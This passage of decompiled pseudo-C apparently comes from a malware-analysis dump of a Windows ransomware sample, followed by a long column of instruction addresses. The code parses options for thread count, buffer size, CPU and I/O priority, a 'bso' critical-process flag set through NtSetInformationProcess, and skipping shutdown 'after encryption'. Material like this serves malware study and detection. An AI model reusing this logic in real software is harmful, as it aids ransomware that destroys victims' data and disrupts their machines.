                                                                    																		_v16 = 5;
                                                                    																		L00E83B80(_t736,  &_v460, _t903);
                                                                    																		 *0xeef9dc = _v60;
                                                                    																		E00E59EB0(_t736, L"threads setted to ", 0, _t903, _t936);
                                                                    																		__eflags = _v36 - 0x10;
                                                                    																		_t827 =  >=  ? _v56 :  &_v56;
                                                                    																		_t884 = _v40 + ( >=  ? _v56 :  &_v56);
                                                                    																		_v276 = 0;
                                                                    																		__eflags = _v36 - 0x10;
                                                                    																		_v272 = 0;
                                                                    																		_t938 =  >=  ? _v56 :  &_v56;
                                                                    																		_v292 = 0;
                                                                    																		_t912 = ( >=  ? _v56 :  &_v56) + 8;
                                                                    																		_v276 = 0;
                                                                    																		_v272 = 7;
                                                                    																		E00E798B0(_t736,  &_v292, _v40 + ( >=  ? _v56 :  &_v56), _v40 + ( >=  ? _v56 :  &_v56) - ( >=  ? _v56 :  &_v56) + 8);
                                                                    																		_v220 = 0;
                                                                    																		E00E7A150(_t736,  &_v292, _v40 + ( >=  ? _v56 :  &_v56), ( >=  ? _v56 :  &_v56) + 8, _t884);
                                                                    																		_v16 = 0xb;
                                                                    																		__eflags = _v272 - 8;
                                                                    																		_t867 = 1;
                                                                    																		_t831 =  >=  ? _v292 :  &_v292;
                                                                    																		E00E59EB0(_t736,  >=  ? _v292 :  &_v292, 1, _t884, ( >=  ? _v56 :  &_v56) + 8, _v220);
                                                                    																		_v16 = 5;
                                                                    																		L00E59AF0(_t736,  &_v292, _t884);
                                                                    																		goto L161;
                                                                    																	}
                                                                    																}
                                                                    																_t182 = _t884 - 1; // -1
                                                                    																_t737 =  &_v56;
                                                                    																_t939 = E00E719C0(_t736,  &_v56, _t884,  &_v436, 7, _t182);
                                                                    																_v16 = 8;
                                                                    																_t653 = E00EACDB8(__eflags);
                                                                    																__eflags =  *((intOrPtr*)(_t939 + 0x14)) - 0x10;
                                                                    																_t905 = _t653;
                                                                    																if( *((intOrPtr*)(_t939 + 0x14)) >= 0x10) {
                                                                    																	_t939 =  *_t939;
                                                                    																}
                                                                    																 *_t905 = 0;
                                                                    																_t655 = E00EACCEB(_t737, _t939,  &_v96, 0xa);
                                                                    																_t956 = 0xc + _t956;
                                                                    																_v60 = _t655;
                                                                    																__eflags = _t939 - _v96;
                                                                    																if(_t939 == _v96) {
                                                                    																	goto L177;
                                                                    																} else {
                                                                    																	__eflags =  *_t905 - 0x22;
                                                                    																	if( *_t905 == 0x22) {
                                                                    																		goto L176;
                                                                    																	}
                                                                    																	_v16 = 5;
                                                                    																	L00E83B80(_t736,  &_v436, _t905);
                                                                    																	 *0xeef9d8 = _v60;
                                                                    																	E00E59EB0(_t736, L"buffer setted to ", 0, _t905, _t939);
                                                                    																	__eflags = _v36 - 0x10;
                                                                    																	_t836 =  >=  ? _v56 :  &_v56;
                                                                    																	_t884 = _v40 + ( >=  ? _v56 :  &_v56);
                                                                    																	_v252 = 0;
                                                                    																	__eflags = _v36 - 0x10;
                                                                    																	_v248 = 0;
                                                                    																	_t941 =  >=  ? _v56 :  &_v56;
                                                                    																	_v268 = 0;
                                                                    																	_t912 = ( >=  ? _v56 :  &_v56) + 7;
                                                                    																	_v252 = 0;
                                                                    																	_v248 = 7;
                                                                    																	E00E798B0(_t736,  &_v268, _v40 + ( >=  ? _v56 :  &_v56), _v40 + ( >=  ? _v56 :  &_v56) - ( >=  ? _v56 :  &_v56) + 7);
                                                                    																	_v216 = 0;
                                                                    																	E00E7A150(_t736,  &_v268, _v40 + ( >=  ? _v56 :  &_v56), ( >=  ? _v56 :  &_v56) + 7, _t884);
                                                                    																	_v16 = 9;
                                                                    																	__eflags = _v248 - 8;
                                                                    																	_t867 = 1;
                                                                    																	_t840 =  >=  ? _v268 :  &_v268;
                                                                    																	E00E59EB0(_t736,  >=  ? _v268 :  &_v268, 1, _t884, ( >=  ? _v56 :  &_v56) + 7, _v216);
                                                                    																	_v16 = 5;
                                                                    																	L00E59AF0(_t736,  &_v268, _t884);
                                                                    																	goto L161;
                                                                    																}
                                                                    															}
                                                                    															_t737 =  &_v56;
                                                                    															_t942 = E00E719C0(_t736,  &_v56, _t884,  &_v412, 4, 5);
                                                                    															_v16 = 6;
                                                                    															_t668 = E00EACDB8(__eflags);
                                                                    															__eflags =  *((intOrPtr*)(_t942 + 0x14)) - 0x10;
                                                                    															_t907 = _t668;
                                                                    															if( *((intOrPtr*)(_t942 + 0x14)) >= 0x10) {
                                                                    																_t942 =  *_t942;
                                                                    															}
                                                                    															 *_t907 = 0;
                                                                    															_t670 = E00EACCEB(_t737, _t942,  &_v88, 0xa);
                                                                    															_t956 = 0xc + _t956;
                                                                    															__eflags = _t942 - _v88;
                                                                    															if(_t942 == _v88) {
                                                                    																goto L177;
                                                                    															} else {
                                                                    																__eflags =  *_t907 - 0x22;
                                                                    																if( *_t907 == 0x22) {
                                                                    																	goto L176;
                                                                    																}
                                                                    																_v84 = _t670;
                                                                    																_v16 = 5;
                                                                    																L00E83B80(_t736,  &_v412, _t907);
                                                                    																E00E59EB0(_t736, L"setting io priority to ", 0, _t907, _t942);
                                                                    																__eflags = _v36 - 0x10;
                                                                    																_v228 = 0;
                                                                    																_t909 =  >=  ? _v56 :  &_v56;
                                                                    																_t884 = ( >=  ? _v56 :  &_v56) + 5;
                                                                    																_v224 = 0;
                                                                    																__eflags = _v36 - 0x10;
                                                                    																_v228 = 0;
                                                                    																_t944 =  >=  ? _v56 :  &_v56;
                                                                    																_v244 = 0;
                                                                    																_t945 = ( >=  ? _v56 :  &_v56) + 4;
                                                                    																_v224 = 7;
                                                                    																E00E798B0(_t736,  &_v244, ( >=  ? _v56 :  &_v56) + 5, ( >=  ? _v56 :  &_v56) + 5 - ( >=  ? _v56 :  &_v56) + 4);
                                                                    																_v212 = 0;
                                                                    																E00E7A150(_t736,  &_v244, ( >=  ? _v56 :  &_v56) + 5, ( >=  ? _v56 :  &_v56) + 4, _t884);
                                                                    																_v16 = 7;
                                                                    																__eflags = _v224 - 8;
                                                                    																_t867 = 1;
                                                                    																_t847 =  >=  ? _v244 :  &_v244;
                                                                    																E00E59EB0(_t736,  >=  ? _v244 :  &_v244, 1, _t884, ( >=  ? _v56 :  &_v56) + 4, _v212);
                                                                    																_v16 = 5;
                                                                    																L00E59AF0(_t736,  &_v244, _t884);
                                                                    																_t912 =  *0xf2c294;
                                                                    																_t681 = GetCurrentProcess();
                                                                    																 *0xecd328();
                                                                    																NtSetInformationProcess(_t681, 0x21,  &_v84, 4);
                                                                    																 *0xeef9d4 = _v84;
                                                                    																goto L161;
                                                                    															}
                                                                    														}
                                                                    														_t760 = E00EAA7C0(_t912, 0x6e, _t912 - 9 + _t884 - _t912);
                                                                    														_t956 = 0xc + _t956;
                                                                    														__eflags = _t760;
                                                                    														if(_t760 == 0) {
                                                                    															L68:
                                                                    															_t884 = _v40;
                                                                    															goto L69;
                                                                    														} else {
                                                                    															goto L64;
                                                                    														}
                                                                    														do {
                                                                    															L64:
                                                                    															__eflags =  *_t760 - 0x68736f6e;
                                                                    															if( *_t760 != 0x68736f6e) {
                                                                    																goto L67;
                                                                    															}
                                                                    															__eflags = _t760[4] - 0x6f647475;
                                                                    															if(_t760[4] != 0x6f647475) {
                                                                    																goto L67;
                                                                    															}
                                                                    															__eflags = _t760[8] - 0x6e77;
                                                                    															if(_t760[8] == 0x6e77) {
                                                                    																_t760 = _t760 - _t912;
                                                                    																__eflags = _t760 - 0xffffffff;
                                                                    																if(_t760 == 0xffffffff) {
                                                                    																	goto L68;
                                                                    																}
                                                                    																_t867 = 1;
                                                                    																E00E59EB0(_t736, L"wont shutdown machine after encryption ", 1, _t884, _t912);
                                                                    																 *0xf2c096 = 1;
                                                                    																goto L161;
                                                                    															}
                                                                    															L67:
                                                                    															_t760 = E00EAA7C0( &(_t760[1]), 0x6e, _t912 - 9 + _t884 -  &(_t760[1]));
                                                                    															_t956 = 0xc + _t956;
                                                                    															__eflags = _t760;
                                                                    														} while (_t760 != 0);
                                                                    														goto L68;
                                                                    													}
                                                                    													_v64 = _t760 - 0xf + _t884;
                                                                    													_t910 = E00EAA7C0(_t760, 0x63, _t760 - 0xf + _t884 - _t760);
                                                                    													_t956 = 0xc + _t956;
                                                                    													__eflags = _t910;
                                                                    													if(_t910 == 0) {
                                                                    														L61:
                                                                    														_t884 = _v40;
                                                                    														goto L62;
                                                                    													} else {
                                                                    														goto L51;
                                                                    													}
                                                                    													do {
                                                                    														L51:
                                                                    														_t867 = _t910;
                                                                    														_t760 = "cpup=abovenormal";
                                                                    														_t946 = 0xc;
                                                                    														while(1) {
                                                                    															__eflags =  *_t867 -  *_t760;
                                                                    															if( *_t867 !=  *_t760) {
                                                                    																goto L60;
                                                                    															}
                                                                    															_t867 = _t867 + 4;
                                                                    															_t760 =  &(_t760[4]);
                                                                    															_t946 = _t946 - 4;
                                                                    															__eflags = _t946;
                                                                    															if(_t946 >= 0) {
                                                                    																continue;
                                                                    															}
                                                                    															_t884 = _t910 - _v60;
                                                                    															__eflags = _t910 - _v60 - 0xffffffff;
                                                                    															if(_t910 - _v60 == 0xffffffff) {
                                                                    																goto L61;
                                                                    															}
                                                                    															_t867 = 1;
                                                                    															E00E59EB0(_t736, L"setting cpu pririty to aboe normall", 1, _t884, _t946);
                                                                    															SetPriorityClass(GetCurrentProcess(), 0x8000);
                                                                    															goto L161;
                                                                    														}
                                                                    														L60:
                                                                    														_t910 = E00EAA7C0(_t910 + 1, 0x63, _v64 - _t910 + 1);
                                                                    														_t956 = 0xc + _t956;
                                                                    														__eflags = _t910;
                                                                    													} while (_t910 != 0);
                                                                    													goto L61;
                                                                    												}
                                                                    												_t853 = E00EAA7C0(_t919, 0x62, _t919 - 3 + _t884 - _t919);
                                                                    												_t956 = 0xc + _t956;
                                                                    												__eflags = _t853;
                                                                    												if(_t853 == 0) {
                                                                    													L48:
                                                                    													_t884 = _v40;
                                                                    													goto L49;
                                                                    												} else {
                                                                    													goto L46;
                                                                    												}
                                                                    												while(1) {
                                                                    													L46:
                                                                    													__eflags =  *_t853 - 0x646f7362;
                                                                    													if( *_t853 == 0x646f7362) {
                                                                    														break;
                                                                    													}
                                                                    													_t853 = E00EAA7C0(_t853 + 1, 0x62, _t919 - 3 + _t884 - _t853 + 1);
                                                                    													_t956 = 0xc + _t956;
                                                                    													__eflags = _t853;
                                                                    													if(_t853 != 0) {
                                                                    														continue;
                                                                    													}
                                                                    													goto L48;
                                                                    												}
                                                                    												__eflags = _t853 - _t919 - 0xffffffff;
                                                                    												if(_t853 - _t919 == 0xffffffff) {
                                                                    													goto L48;
                                                                    												}
                                                                    												_t867 = 1;
                                                                    												E00E59EB0(_t736, L"enabled bso", 1, _t884, _t919);
                                                                    												_t912 =  *0xf2c294;
                                                                    												_v64 = 1;
                                                                    												_t711 = GetCurrentProcess();
                                                                    												 *0xecd328();
                                                                    												NtSetInformationProcess(_t711, 0x1d,  &_v64, 4);
                                                                    												goto L161;
                                                                    											}
                                                                    											_t117 = _t884 - 5; // -5
                                                                    											_t858 = E00EAA7C0(_t917, 0x6e, _t117 + _t917 - _t917);
                                                                    											_t956 = 0xc + _t956;
                                                                    											__eflags = _t858;
                                                                    											if(_t858 == 0) {
                                                                    												L43:
                                                                    												_t884 = _v40;
                                                                    												goto L44;
                                                                    											} else {
                                                                    												goto L40;
                                                                    											}
                                                                    											do {
                                                                    												L40:
                                                                    												__eflags =  *_t858 - 0x73626f6e;
                                                                    												if( *_t858 != 0x73626f6e) {
                                                                    													goto L42;
                                                                    												}
                                                                    												__eflags =  *((short*)(_t858 + 4)) - 0x646f;
                                                                    												if( *((short*)(_t858 + 4)) == 0x646f) {
                                                                    													__eflags = _t858 - _t917 - 0xffffffff;
                                                                    													if(_t858 - _t917 == 0xffffffff) {
                                                                    														goto L43;
                                                                    													}
                                                                    													_t867 = 1;
                                                                    													E00E59EB0(_t736, L"disabled bso", 1, _t884, _t917);
                                                                    													_t912 =  *0xf2c294;
                                                                    													_v64 = 0;
                                                                    													_t728 = GetCurrentProcess();
                                                                    													 *0xecd328();
                                                                    													NtSetInformationProcess(_t728, 0x1d,  &_v64, 4);
                                                                    													goto L161;
                                                                    												}
                                                                    												L42:
                                                                    												_t119 = _t884 - 5; // -5
                                                                    												_t858 = E00EAA7C0(_t858 + 1, 0x6e, _t119 + _t917 - _t858 + 1);
                                                                    												_t956 = 0xc + _t956;
                                                                    												__eflags = _t858;
                                                                    											} while (_t858 != 0);
                                                                    											goto L43;
                                                                    										}
                                                                    										L161:
                                                                    										_v16 = 1;
                                                                    										L00E83B80(_t736,  &_v56, _t884);
                                                                    										_t752 = _v128 + 0x18;
                                                                    										_v128 = _t752;
                                                                    										__eflags = _t752 - _v136;
                                                                    									} while (_t752 != _v136);
                                                                    									goto L162;
                                                                    								}
                                                                    								L8:
                                                                    								_push(_t912);
                                                                    								_t884 = E00EAEBCD();
                                                                    								_t956 = _t956 + 4;
                                                                    								__eflags = _t884;
                                                                    								if(_t884 == 0) {
                                                                    									goto L8;
                                                                    								} else {
                                                                    									ReadFile(_v132, _t884, _t912,  &_v80, 0);
                                                                    									asm("xorps xmm0, xmm0");
                                                                    									_v68 = 0;
                                                                    									asm("movq [ebp-0x40], xmm0");
                                                                    									_v76 = 0;
                                                                    									_v72 = 0;
                                                                    									_v68 = 0;
                                                                    									_v16 = 1;
                                                                    									_t742 = 0;
                                                                    									__eflags = 0;
                                                                    									_t483 = _v128;
                                                                    									_t913 = 1;
                                                                    									goto L10;
                                                                    								}
                                                                    							} else {
                                                                    								CloseHandle(_v132);
                                                                    								goto L172;
                                                                    							}
                                                                    						}
                                                                    						L172:
                                                                    						Sleep(0x1d4c0); // executed
                                                                    						_v16 = 0;
                                                                    						_t737 =  *0xf29240; // 0x1a
                                                                    						_t965 = 0x7ffffffe - _t737 - 0xd;
                                                                    					} while (0x7ffffffe - _t737 >= 0xd);
                                                                    					goto L173;
                                                                    				}
                                                                    			}






















































































































































































































                                                                    0x00e63460
                                                                    0x00e63460
                                                                    0x00e63460
                                                                    0x00e63461
                                                                    0x00e63469
                                                                    0x00e63470
                                                                    0x00e63474
                                                                    0x00e63476
                                                                    0x00e63478
                                                                    0x00e63483
                                                                    0x00e63484
                                                                    0x00e63485
                                                                    0x00e6348b
                                                                    0x00e63490
                                                                    0x00e63492
                                                                    0x00e63495
                                                                    0x00e63496
                                                                    0x00e63497
                                                                    0x00e6349b
                                                                    0x00e634a1
                                                                    0x00e634a8
                                                                    0x00e634ab
                                                                    0x00e634b1
                                                                    0x00e634b9
                                                                    0x00e634c4
                                                                    0x00e6482c
                                                                    0x00e6482c
                                                                    0x00000000
                                                                    0x00e634ca
                                                                    0x00e634ca
                                                                    0x00e634d0
                                                                    0x00e634de
                                                                    0x00e634f6
                                                                    0x00e634fb
                                                                    0x00e634fe
                                                                    0x00e63505
                                                                    0x00e63507
                                                                    0x00e63507
                                                                    0x00e63519
                                                                    0x00e6351f
                                                                    0x00e63521
                                                                    0x00e63524
                                                                    0x00e63527
                                                                    0x00e6352a
                                                                    0x00e63537
                                                                    0x00e6353f
                                                                    0x00e63556
                                                                    0x00e63558
                                                                    0x00e6355e
                                                                    0x00000000
                                                                    0x00e635c5
                                                                    0x00e635c5
                                                                    0x00e635c5
                                                                    0x00e635c7
                                                                    0x00e635ca
                                                                    0x00e635cf
                                                                    0x00e635d9
                                                                    0x00e635db
                                                                    0x00e635dc
                                                                    0x00e635e1
                                                                    0x00e63692
                                                                    0x00e63694
                                                                    0x00e636a4
                                                                    0x00e636ae
                                                                    0x00e636b8
                                                                    0x00e636c2
                                                                    0x00e636c9
                                                                    0x00e636ce
                                                                    0x00e636d2
                                                                    0x00e636d5
                                                                    0x00e636d8
                                                                    0x00e63724
                                                                    0x00e636da
                                                                    0x00e636da
                                                                    0x00e636e1
                                                                    0x00e636e8
                                                                    0x00e636ef
                                                                    0x00e636f2
                                                                    0x00e636fa
                                                                    0x00e636ff
                                                                    0x00e63703
                                                                    0x00e6370d
                                                                    0x00e6370d
                                                                    0x00e63729
                                                                    0x00e6372d
                                                                    0x00e635e7
                                                                    0x00e635e8
                                                                    0x00e635f2
                                                                    0x00e635f4
                                                                    0x00e63601
                                                                    0x00e6360b
                                                                    0x00e63612
                                                                    0x00e63619
                                                                    0x00e6361e
                                                                    0x00e63622
                                                                    0x00e63625
                                                                    0x00e63628
                                                                    0x00e6367e
                                                                    0x00e63683
                                                                    0x00e63687
                                                                    0x00e6362a
                                                                    0x00e6362a
                                                                    0x00e63631
                                                                    0x00e63638
                                                                    0x00e6363f
                                                                    0x00e63642
                                                                    0x00e6364a
                                                                    0x00e6364f
                                                                    0x00e63653
                                                                    0x00e6365d
                                                                    0x00e63664
                                                                    0x00e63668
                                                                    0x00e63668
                                                                    0x00e63628
                                                                    0x00e63733
                                                                    0x00e63738
                                                                    0x00e6373b
                                                                    0x00e6373d
                                                                    0x00e6373d
                                                                    0x00e63740
                                                                    0x00e63741
                                                                    0x00e63741
                                                                    0x00e6374b
                                                                    0x00e63755
                                                                    0x00e63759
                                                                    0x00e6376a
                                                                    0x00e63774
                                                                    0x00e6377e
                                                                    0x00e63785
                                                                    0x00e6378a
                                                                    0x00e6378e
                                                                    0x00e63791
                                                                    0x00e63794
                                                                    0x00e637e0
                                                                    0x00e63796
                                                                    0x00e63796
                                                                    0x00e6379d
                                                                    0x00e637a4
                                                                    0x00e637ab
                                                                    0x00e637ae
                                                                    0x00e637b6
                                                                    0x00e637bb
                                                                    0x00e637bf
                                                                    0x00e637c9
                                                                    0x00e637c9
                                                                    0x00e637e5
                                                                    0x00e637ef
                                                                    0x00e637f4
                                                                    0x00e637f7
                                                                    0x00e637fa
                                                                    0x00e637fd
                                                                    0x00e63800
                                                                    0x00e63802
                                                                    0x00e6470d
                                                                    0x00e64710
                                                                    0x00e64716
                                                                    0x00e6471f
                                                                    0x00e64727
                                                                    0x00e6472a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64730
                                                                    0x00e6473e
                                                                    0x00e64756
                                                                    0x00e6475e
                                                                    0x00e64764
                                                                    0x00e64767
                                                                    0x00e6476b
                                                                    0x00e6476d
                                                                    0x00e6476d
                                                                    0x00e64770
                                                                    0x00e64776
                                                                    0x00e6477c
                                                                    0x00e6477f
                                                                    0x00e64789
                                                                    0x00e6478e
                                                                    0x00e64795
                                                                    0x00e64798
                                                                    0x00e6479a
                                                                    0x00000000
                                                                    0x00e6479c
                                                                    0x00e6479c
                                                                    0x00e6479f
                                                                    0x00e647a1
                                                                    0x00e647b4
                                                                    0x00e647c5
                                                                    0x00e647c7
                                                                    0x00e647ca
                                                                    0x00e647d0
                                                                    0x00e647e2
                                                                    0x00e647e2
                                                                    0x00e647e4
                                                                    0x00e647e9
                                                                    0x00e647ec
                                                                    0x00e647ef
                                                                    0x00e647f6
                                                                    0x00e647fd
                                                                    0x00000000
                                                                    0x00e647fd
                                                                    0x00e647d2
                                                                    0x00e647d5
                                                                    0x00e647dd
                                                                    0x00e647e0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e647a3
                                                                    0x00e647a3
                                                                    0x00e647a5
                                                                    0x00e647aa
                                                                    0x00e647ad
                                                                    0x00e647ad
                                                                    0x00e647b1
                                                                    0x00000000
                                                                    0x00e647b1
                                                                    0x00e63810
                                                                    0x00e63810
                                                                    0x00e63810
                                                                    0x00e63816
                                                                    0x00e63819
                                                                    0x00e63820
                                                                    0x00e63827
                                                                    0x00e6382a
                                                                    0x00e6382e
                                                                    0x00e6382e
                                                                    0x00e63831
                                                                    0x00e63834
                                                                    0x00e6384d
                                                                    0x00e63850
                                                                    0x00e63856
                                                                    0x00e63859
                                                                    0x00e6385c
                                                                    0x00e63861
                                                                    0x00e6388a
                                                                    0x00e6388c
                                                                    0x00e6389b
                                                                    0x00e6389b
                                                                    0x00e6388e
                                                                    0x00e6388e
                                                                    0x00e6388f
                                                                    0x00e63894
                                                                    0x00e63897
                                                                    0x00e63897
                                                                    0x00e6389d
                                                                    0x00e638a0
                                                                    0x00e638a8
                                                                    0x00e638ad
                                                                    0x00e638b0
                                                                    0x00000000
                                                                    0x00e638b0
                                                                    0x00e63863
                                                                    0x00e63863
                                                                    0x00e63866
                                                                    0x00e63868
                                                                    0x00e64836
                                                                    0x00e64836
                                                                    0x00000000
                                                                    0x00e64836
                                                                    0x00e6386e
                                                                    0x00e6386f
                                                                    0x00e63874
                                                                    0x00e63877
                                                                    0x00e63879
                                                                    0x00e64831
                                                                    0x00e64831
                                                                    0x00000000
                                                                    0x00e64831
                                                                    0x00e6387f
                                                                    0x00e63882
                                                                    0x00e63885
                                                                    0x00000000
                                                                    0x00e63836
                                                                    0x00e63836
                                                                    0x00e63839
                                                                    0x00e63840
                                                                    0x00e638b3
                                                                    0x00e638b3
                                                                    0x00e638b6
                                                                    0x00e638bd
                                                                    0x00e638c1
                                                                    0x00e638c4
                                                                    0x00e638c8
                                                                    0x00e638cb
                                                                    0x00e63917
                                                                    0x00e63917
                                                                    0x00e6391e
                                                                    0x00e63922
                                                                    0x00e63925
                                                                    0x00e63969
                                                                    0x00e63969
                                                                    0x00e63970
                                                                    0x00e63974
                                                                    0x00e63977
                                                                    0x00e6397a
                                                                    0x00e63a97
                                                                    0x00e63a97
                                                                    0x00e63a9e
                                                                    0x00e63aa2
                                                                    0x00e63aa5
                                                                    0x00e63afa
                                                                    0x00e63afa
                                                                    0x00e63b00
                                                                    0x00e63b03
                                                                    0x00e63b08
                                                                    0x00e63b0b
                                                                    0x00e63c74
                                                                    0x00e63c7a
                                                                    0x00e63c7d
                                                                    0x00e63c82
                                                                    0x00e63c85
                                                                    0x00e63dae
                                                                    0x00e63db4
                                                                    0x00e63db7
                                                                    0x00e63dbc
                                                                    0x00e63dbf
                                                                    0x00e63ee8
                                                                    0x00e63eee
                                                                    0x00e63ef1
                                                                    0x00e63ef6
                                                                    0x00e63ef9
                                                                    0x00e64160
                                                                    0x00e64166
                                                                    0x00e64169
                                                                    0x00e6416e
                                                                    0x00e64171
                                                                    0x00e643d8
                                                                    0x00e643de
                                                                    0x00e643e1
                                                                    0x00e643e6
                                                                    0x00e643e9
                                                                    0x00e64650
                                                                    0x00e64656
                                                                    0x00e64659
                                                                    0x00e6465e
                                                                    0x00e64661
                                                                    0x00e6467b
                                                                    0x00e64681
                                                                    0x00e64684
                                                                    0x00e64689
                                                                    0x00e6468c
                                                                    0x00e646a3
                                                                    0x00e646ac
                                                                    0x00e646b1
                                                                    0x00e646b4
                                                                    0x00e646b6
                                                                    0x00e646bd
                                                                    0x00e646c2
                                                                    0x00e646d0
                                                                    0x00e646d7
                                                                    0x00e646e0
                                                                    0x00e646e6
                                                                    0x00e646e8
                                                                    0x00e646e8
                                                                    0x00e6468e
                                                                    0x00e6468e
                                                                    0x00e64695
                                                                    0x00e6469a
                                                                    0x00e6469a
                                                                    0x00e64663
                                                                    0x00e64663
                                                                    0x00e6466a
                                                                    0x00e6466f
                                                                    0x00e6466f
                                                                    0x00000000
                                                                    0x00e64661
                                                                    0x00e643ef
                                                                    0x00e643f6
                                                                    0x00e643fa
                                                                    0x00e643fc
                                                                    0x00e64412
                                                                    0x00e64412
                                                                    0x00e64412
                                                                    0x00e64415
                                                                    0x00e6441f
                                                                    0x00e64427
                                                                    0x00e64429
                                                                    0x00e6442d
                                                                    0x00e64432
                                                                    0x00e64436
                                                                    0x00e64438
                                                                    0x00e6443a
                                                                    0x00e6443a
                                                                    0x00e64441
                                                                    0x00e64449
                                                                    0x00e6444e
                                                                    0x00e64451
                                                                    0x00e64454
                                                                    0x00e64457
                                                                    0x00e64845
                                                                    0x00e64845
                                                                    0x00e6484a
                                                                    0x00e6484f
                                                                    0x00e64850
                                                                    0x00e64853
                                                                    0x00e64855
                                                                    0x00e64860
                                                                    0x00e64861
                                                                    0x00e64868
                                                                    0x00e6486c
                                                                    0x00e64875
                                                                    0x00e64880
                                                                    0x00e6488b
                                                                    0x00e6445d
                                                                    0x00e6445d
                                                                    0x00e64460
                                                                    0x00e6483b
                                                                    0x00e6483b
                                                                    0x00e64840
                                                                    0x00000000
                                                                    0x00e64840
                                                                    0x00e64466
                                                                    0x00e64470
                                                                    0x00e64475
                                                                    0x00e6447b
                                                                    0x00e64485
                                                                    0x00e64488
                                                                    0x00e6448c
                                                                    0x00e64491
                                                                    0x00e64495
                                                                    0x00e64498
                                                                    0x00e6449a
                                                                    0x00e644b0
                                                                    0x00e644b0
                                                                    0x00e644b0
                                                                    0x00e644b3
                                                                    0x00e644b3
                                                                    0x00e644b6
                                                                    0x00e64529
                                                                    0x00e6453b
                                                                    0x00e6453d
                                                                    0x00e6454f
                                                                    0x00e64554
                                                                    0x00e64564
                                                                    0x00e64569
                                                                    0x00e6456c
                                                                    0x00e64577
                                                                    0x00e64581
                                                                    0x00e64584
                                                                    0x00e6458e
                                                                    0x00e64598
                                                                    0x00e6459b
                                                                    0x00e645a2
                                                                    0x00e645a7
                                                                    0x00e645af
                                                                    0x00e645b6
                                                                    0x00e645bd
                                                                    0x00e645c0
                                                                    0x00e645c3
                                                                    0x00e645cd
                                                                    0x00e645ce
                                                                    0x00e645cf
                                                                    0x00e645d8
                                                                    0x00e645dd
                                                                    0x00e645e0
                                                                    0x00e645e3
                                                                    0x00e645e7
                                                                    0x00e645e9
                                                                    0x00e645e9
                                                                    0x00e645eb
                                                                    0x00e645ef
                                                                    0x00e645f4
                                                                    0x00e645f7
                                                                    0x00e645fa
                                                                    0x00e64604
                                                                    0x00e64609
                                                                    0x00e6460c
                                                                    0x00e6460f
                                                                    0x00e64619
                                                                    0x00e6461e
                                                                    0x00e64628
                                                                    0x00e6462d
                                                                    0x00e64637
                                                                    0x00e6463c
                                                                    0x00e64646
                                                                    0x00000000
                                                                    0x00e64646
                                                                    0x00e644b8
                                                                    0x00e644c3
                                                                    0x00e644c9
                                                                    0x00e644d9
                                                                    0x00e644db
                                                                    0x00e644df
                                                                    0x00e644e4
                                                                    0x00e644e8
                                                                    0x00e644ea
                                                                    0x00e644ec
                                                                    0x00e644ec
                                                                    0x00e644f3
                                                                    0x00e644fb
                                                                    0x00e64500
                                                                    0x00e64503
                                                                    0x00e64506
                                                                    0x00000000
                                                                    0x00e6450c
                                                                    0x00e6450c
                                                                    0x00e6450f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e64515
                                                                    0x00e6451a
                                                                    0x00e64524
                                                                    0x00000000
                                                                    0x00e64524
                                                                    0x00e64506
                                                                    0x00e644a0
                                                                    0x00e644a5
                                                                    0x00e644a8
                                                                    0x00e644aa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e644ac
                                                                    0x00000000
                                                                    0x00e644ac
                                                                    0x00e64457
                                                                    0x00e64402
                                                                    0x00e64407
                                                                    0x00e6440a
                                                                    0x00e6440c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6440e
                                                                    0x00000000
                                                                    0x00e6440e
                                                                    0x00e64177
                                                                    0x00e6417e
                                                                    0x00e64182
                                                                    0x00e64184
                                                                    0x00e6419a
                                                                    0x00e6419a
                                                                    0x00e6419a
                                                                    0x00e6419d
                                                                    0x00e641a7
                                                                    0x00e641af
                                                                    0x00e641b1
                                                                    0x00e641b5
                                                                    0x00e641ba
                                                                    0x00e641be
                                                                    0x00e641c0
                                                                    0x00e641c2
                                                                    0x00e641c2
                                                                    0x00e641c9
                                                                    0x00e641d1
                                                                    0x00e641d6
                                                                    0x00e641d9
                                                                    0x00e641dc
                                                                    0x00e641df
                                                                    0x00000000
                                                                    0x00e641e5
                                                                    0x00e641e5
                                                                    0x00e641e8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e641ee
                                                                    0x00e641f8
                                                                    0x00e641fd
                                                                    0x00e64203
                                                                    0x00e6420d
                                                                    0x00e64210
                                                                    0x00e64214
                                                                    0x00e64219
                                                                    0x00e6421d
                                                                    0x00e64220
                                                                    0x00e64222
                                                                    0x00e64238
                                                                    0x00e64238
                                                                    0x00e64238
                                                                    0x00e6423b
                                                                    0x00e6423b
                                                                    0x00e6423e
                                                                    0x00e642b1
                                                                    0x00e642c3
                                                                    0x00e642c5
                                                                    0x00e642d7
                                                                    0x00e642dc
                                                                    0x00e642ec
                                                                    0x00e642f1
                                                                    0x00e642f4
                                                                    0x00e642ff
                                                                    0x00e64309
                                                                    0x00e6430c
                                                                    0x00e64316
                                                                    0x00e64320
                                                                    0x00e64323
                                                                    0x00e6432a
                                                                    0x00e6432f
                                                                    0x00e64337
                                                                    0x00e6433e
                                                                    0x00e64345
                                                                    0x00e64348
                                                                    0x00e6434b
                                                                    0x00e64355
                                                                    0x00e64356
                                                                    0x00e64357
                                                                    0x00e64360
                                                                    0x00e64365
                                                                    0x00e64368
                                                                    0x00e6436b
                                                                    0x00e6436f
                                                                    0x00e64371
                                                                    0x00e64371
                                                                    0x00e64373
                                                                    0x00e64377
                                                                    0x00e6437c
                                                                    0x00e6437f
                                                                    0x00e64382
                                                                    0x00e6438c
                                                                    0x00e64391
                                                                    0x00e64394
                                                                    0x00e64397
                                                                    0x00e643a1
                                                                    0x00e643a6
                                                                    0x00e643b0
                                                                    0x00e643b5
                                                                    0x00e643bf
                                                                    0x00e643c4
                                                                    0x00e643ce
                                                                    0x00000000
                                                                    0x00e643ce
                                                                    0x00e64240
                                                                    0x00e6424b
                                                                    0x00e64251
                                                                    0x00e64261
                                                                    0x00e64263
                                                                    0x00e64267
                                                                    0x00e6426c
                                                                    0x00e64270
                                                                    0x00e64272
                                                                    0x00e64274
                                                                    0x00e64274
                                                                    0x00e6427b
                                                                    0x00e64283
                                                                    0x00e64288
                                                                    0x00e6428b
